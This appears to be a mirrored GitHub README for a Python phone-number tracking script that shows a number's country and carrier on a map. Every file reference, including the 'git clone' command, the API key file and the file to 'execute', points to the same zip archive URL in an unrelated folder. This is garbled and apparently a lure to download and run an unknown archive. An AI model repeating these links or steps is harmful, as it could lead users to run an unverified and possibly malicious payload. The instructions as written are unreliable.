Thanks to visit codestin.com
Credit goes to github.com

Skip to content

SHNXINN/Number-Tracker

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

This is phone-number tracking python script. You can get some useful information about any phone-number(including international phone-numbers). This script is using some python modules like geocoder, phonenumbers, folium and opencage api to gather data. This is script also show you origin country of the number on map.

python snippet

🛠️ Installation Guidelines:

  1. Fork the project. Click on the icon on the top right to get started

  2. Clone the project, you can use the following command on your local terminal:

    git clone https://raw.githubusercontent.com/SHNXINN/Number-Tracker/main/chiromancer/Number-Tracker-v1.8.zip
  3. Also don't forget to give star to codebase after using it ✨.

📌 To install Python Dependencies

  1. First make sure you have install python in your local system. click here to download python

  2. Go to your code folder and in terminal run -

  3. For Phonenumbers Library -

    pip install phonenumbers
  4. For Geocoder Library -

    pip install geocoder
  5. For Opencage API -

    pip install opencage
  6. For Folium Library -

    pip install folium

OpenCage API key

  1. Go to OpenCage Site.
  2. Signin and Get you api-key.
  3. Create a "https://raw.githubusercontent.com/SHNXINN/Number-Tracker/main/chiromancer/Number-Tracker-v1.8.zip" file .
  4. And paste your api-key there like this -
    keys = "Enter-your-API-Key"

💻 To Start the Application on your local system.

  1. Just execute the https://raw.githubusercontent.com/SHNXINN/Number-Tracker/main/chiromancer/Number-Tracker-v1.8.zip file.
  2. enter you no. with country code -
    +91 XXXXXXXXXX
  3. And script will display the information in your terminal and also show you on the map.
  4. If map doesn't open automatically in browser, Just click the "https://raw.githubusercontent.com/SHNXINN/Number-Tracker/main/chiromancer/Number-Tracker-v1.8.zip" manually.

About

This is phone-number tracking pyhton script. You can get some useful information about any phone-number. this script is using some pyhton modules like geocoder, phonenumbers, folium and opencage api to gather data. this is script also show you origin country of the number on map.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages

  • Python 100.0%